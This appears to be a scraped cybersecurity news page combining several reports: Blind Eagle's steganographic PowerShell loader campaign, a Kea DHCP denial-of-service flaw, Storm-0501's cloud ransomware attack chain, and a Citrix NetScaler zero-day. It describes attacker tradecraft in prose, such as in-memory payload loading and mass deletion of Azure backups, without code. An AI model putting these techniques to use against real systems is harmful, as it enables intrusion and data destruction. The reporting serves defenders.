Microsoft Threat Intelligence has detailed the evolving tactics of the financially motivated threat actor Storm-0501, which has transitioned from traditional on-premises ransomware deployments to sophisticated cloud-based operations. Unlike conventional ransomware that relies on endpoint encryption malware and subsequent decryption key negotiations, Storm-0501 exploits cloud-native capabilities to exfiltrate massive data volumes, obliterate backups, and enforce ransom […]
The U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) announced a fresh round of sanctions against two individuals and two entities for their role in the North Korean remote information technology (IT) worker scheme to generate illicit revenue for the regime’s weapons of mass destruction and ballistic missile programs.
“The North Korean regime continues to target American
Over the past year, a shadowy threat actor known as TAG-144—also tracked under aliases Blind Eagle and APT-C-36—has intensified operations against South American government institutions.
First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.
In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.
Initial access typically leverages compromised or spoofed email accounts from local government agencies, luring users into opening malicious documents or SVG attachments.
These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord’s CDN.
Recorded Future researchers identified numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary’s ability to blend social engineering with technical subterfuge.
Phishing pages linked to Cluster 4 (Source – Recordedfuture)
The impact of TAG-144’s campaigns has been most severe in Colombia’s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.
Despite sharing core tactics across clusters—dynamic DNS domains, open-source RATs, and stolen crypters—the group’s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.
Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.
Infection Mechanism and Steganographic Payload Extraction
One of TAG-144’s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.
Payload hosted on archive[.]org URL (Source – Recordedfuture)
Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading antivirus detection.
For example, the deobfuscated PowerShell segment responsible for this process appears as:
This in-memory injection, coupled with dynamic domain resolution—often leveraging services like duckdns.org and noip.com—ensures that the RAT’s command-and-control infrastructure remains agile and difficult to trace.
By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a persistent threat to government networks across the region.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
A recent investigation has uncovered that relying solely on large language models (LLMs) to generate application code can introduce critical security vulnerabilities, according to a detailed blog post published on August 22, 2025. The research underscores that LLMs, which are trained on broad internet data—much of it insecure example code—often replicate unsafe patterns without warning […]
Cybersecurity researchers at Truesec have uncovered a sophisticated malware campaign distributing a weaponized PDF editor under the guise of “AppSuite PDF Editor.” This operation, which began on June 26, 2025, involves multiple websites promoting the software as a free utility tool, overlapping with findings from Expel on similar threats like ManualFinder. The malicious executable, PDF […]
A newly disclosed vulnerability in the widely used ISC Kea DHCP server poses a significant security risk to network infrastructure worldwide.
The flaw, designated CVE-2025-40779, allows remote attackers to crash DHCP services with just a single maliciously crafted packet, potentially disrupting network operations across entire organizations.
The vulnerability affects multiple versions of the Kea DHCP server, including versions 2.7.1 through 2.7.9, 3.0.0, and 3.1.0.
Key Takeaways 1. CVE-2025-40779 lets attackers crash Kea DHCPv4 with one crafted unicast packet. 2. Affects Kea 2.7.1–2.7.9, 3.0.0, 3.1.0; CVSS 7.5; no workaround. 3. Upgrade immediately.
Network administrators running these versions face immediate exposure to denial-of-service attacks that require no authentication or special privileges to execute.
Kea DHCP Server DoS Vulnerability
The vulnerability stems from an assertion failure in the kea-dhcp4 process when specific client options interact with the subnet selection mechanism.
When a DHCPv4 client transmits a request containing particular option combinations, and the Kea server fails to locate an appropriate subnet for that client, the service terminates unexpectedly with a fatal assertion error.
The attack vector is particularly concerning because it only affects unicast messages sent directly to the Kea server.
Broadcast DHCP messages, which represent normal network traffic, do not trigger this vulnerability. This specificity suggests that attackers could deliberately target DHCP servers with precisely crafted unicast packets designed to exploit this weakness.
The Common Vulnerability Scoring System (CVSS) has assigned this flaw a score of 7.5, categorizing it as high severity.
The CVSS vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H indicates that the vulnerability can be exploited remotely with low complexity, requires no privileges or user interaction, and results in high availability impact.
The vulnerability was discovered through collaborative security research, with acknowledgments going to Jochen M., Martin Dinev from Trading212, Ashwani Kumar from the Post Graduate Institute of Medical Education & Research in Chandigarh, India, Bret Giddings from the University of Essex, and Florian Ritterhoff from Munich University of Applied Sciences.
Risk Factors
Details
Affected Products
Kea 2.7.1 – 2.7.93.0.03.1.0
Impact
Denial of Service
Exploit Prerequisites
Remote unicast DHCPv4 request with specific client option set
CVSS 3.1 Score
7.5 (High)
Mitigations
ISC has released patched versions to address this critical vulnerability. Organizations must immediately upgrade to Kea version 3.0.1 or 3.1.1, depending on their current deployment.
No workarounds exist for this vulnerability, making immediate patching the only viable defense strategy.
Network administrators should prioritize this update, as DHCP services represent critical infrastructure components.
A successful attack could render entire network segments unable to obtain IP addresses, effectively creating widespread connectivity outages.
While ISC reports no known active exploits, the simplicity of the attack vector makes this vulnerability an attractive target for malicious actors seeking to disrupt network operations.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The Cybersecurity and Infrastructure Security Agency (CISA) unveiled a comprehensive Cybersecurity Advisory (CSA) designed to empower network defenders to detect, hunt, and mitigate the activities of advanced persistent threat (APT) actors linked to the People’s Republic of China. Drawing on a coordinated effort with the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), […]
Microsoft Threat Intelligence has released a detailed report exposing a significant evolution in ransomware attacks, pioneered by the financially motivated threat actor Storm-0501.
The group has shifted from traditional on-premises ransomware to a more destructive, cloud-native strategy that involves data exfiltration and destruction, fundamentally changing the nature of ransomware threats for businesses operating in hybrid cloud environments.
Unlike conventional attacks that encrypt files on local servers and demand payment for a decryption key, Storm-0501’s new method is far more devastating.
Overview of Storm-0501 cloud-based ransomware attack chain.
The group leverages cloud-native capabilities to first exfiltrate massive volumes of sensitive data, then systematically destroys the original data and any backups within the victim’s cloud environment before demanding a ransom.
This “steal-and-destroy” tactic eliminates the possibility of recovery from local backups and places immense pressure on victim organizations.
The attack chain, as detailed by Microsoft, is a sophisticated blend of on-premises and cloud infiltration. It often begins with a compromise of a company’s local Active Directory.
From this foothold, the attackers pivot to the cloud, targeting Microsoft Entra ID (formerly Azure AD). Their primary objective is to find a high-privilege account, such as a Global Administrator, that lacks robust security, particularly multi-factor authentication (MFA).
In a recent campaign analyzed by Microsoft, Storm-0501 identified a synced, non-human Global Administrator account without a registered MFA method.
Storm-0501 Attack Chain
The attackers reset the account’s password on-premises, which then synchronized to the cloud. By taking over this account, they were able to enroll their own MFA device, bypassing existing security policies and gaining complete control over the cloud domain.
With top-level administrative access, the attackers elevate their privileges within Azure to become an “Owner” of all the organization’s cloud subscriptions.
They then initiate a discovery phase to map out critical assets, including data stores and backups. Following discovery, they exfiltrate the data using cloud tools like AzCopy.
The final impact phase is swift and catastrophic. Storm-0501 initiates a mass-deletion of Azure resources, including storage accounts, virtual machine snapshots, and recovery vaults.
For data protected by resource locks or immutability policies, the attackers first attempt to disable these protections. If unsuccessful, they resort to encrypting the remaining data with a key they control and then deleting the key, rendering the information permanently inaccessible. The extortion demand is then typically delivered via Microsoft Teams using a compromised account.
To combat these threats, Microsoft is urging organizations to adopt a multi-layered defense strategy. Key recommendations include enforcing phishing-resistant MFA for all users, practicing the principle of least privilege, and ensuring privileged accounts are cloud-native and secured.
Microsoft also highlights the importance of using built-in cloud security features like Microsoft Defender for Cloud, applying resource locks to critical assets, and enabling immutability and soft-delete policies on storage and key vaults to prevent irreversible data loss.
Storm-0501, previously known for attacks on U.S. school districts and the healthcare sector, continues to demonstrate its proficiency in navigating complex hybrid environments, underscoring the urgent need for businesses to adapt their security posture for the cloud era.
Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant Updates.
The Cybersecurity and Infrastructure Security Agency (CISA) has issued an urgent alert after detecting active exploitation of a critical zero-day remote code execution (RCE) vulnerability in Citrix NetScaler devices. Designated CVE-2025-7775, the flaw stems from a memory overflow in NetScaler’s traffic management subsystem and was recently added to CISA’s Known Exploited Vulnerabilities (KEV) Catalog. Evidence […]
CISA has issued an urgent warning regarding a critical zero-day vulnerability affecting Citrix NetScaler systems, designated as CVE-2025-7775.
This memory overflow vulnerability enables remote code execution (RCE) and has been actively exploited by malicious cyber actors, prompting immediate inclusion in CISA’s Known Exploited Vulnerabilities (KEV) Catalog on August 26, 2025.
The vulnerability, classified as a memory overflow flaw, affects Citrix NetScaler Application Delivery Controller (ADC) and Gateway systems.
Memory overflow vulnerabilities occur when applications write data beyond allocated memory boundaries, potentially allowing attackers to execute arbitrary code on vulnerable systems.
In the context of NetScaler infrastructure, this represents a particularly severe threat vector given these systems’ critical role in enterprise network architecture.
The Common Vulnerability Scoring System (CVSS) classification and technical specifics indicate this is a buffer overflow condition that can be triggered remotely without authentication requirements.
Exploitation techniques typically involve crafting malicious HTTP requests containing oversized data payloads that exceed allocated memory buffers, leading to memory corruption and potential code execution with elevated privileges.
NetScaler systems running vulnerable firmware versions are susceptible to unauthenticated remote attacks, where threat actors can leverage specially crafted network packets to trigger the overflow condition.
The vulnerability affects the system’s packet processing engine, allowing attackers to bypass security controls and gain administrative access to the appliance.
– Network accessibility to NetScaler management interface- No authentication required- Ability to send crafted HTTP requests- Target system running vulnerable firmware version
CVSS 3.1 Score
9.8 (Critical)
Remediation
CISA’s Binding Operational Directive (BOD) 22-01 requires all Federal Civilian Executive Branch (FCEB) agencies to implement immediate remediation measures for CVE-2025-7775.
The directive establishes strict timelines for patching vulnerabilities based on the Common Weakness Enumeration (CWE) classification and evidence of active exploitation.
Organizations must implement network segmentation and access control lists (ACLs) as temporary mitigation measures while applying vendor-provided patches.
Citrix has released a security bulletin containing firmware updates that address the memory overflow condition through improved bounds checking and input validation mechanisms.
System administrators should prioritize updating to the latest NetScaler firmware version that includes the security fix, typically involving the nsconfig command-line interface for configuration management.
Additionally, implementing Web Application Firewall (WAF) rules can help detect and block exploitation attempts targeting the vulnerable code path.
The inclusion of CVE-2025-7775 in the KEV Catalog highlights the critical nature of this vulnerability and the documented evidence of active exploitation in the wild, necessitating an immediate organizational response to prevent potential compromise of enterprise network infrastructure.
Tired of Filling Forms for security & Compliance questionnaires? Automate them in minutes with 1up! Start Your Free Trial Now!
.webp)
.webp)
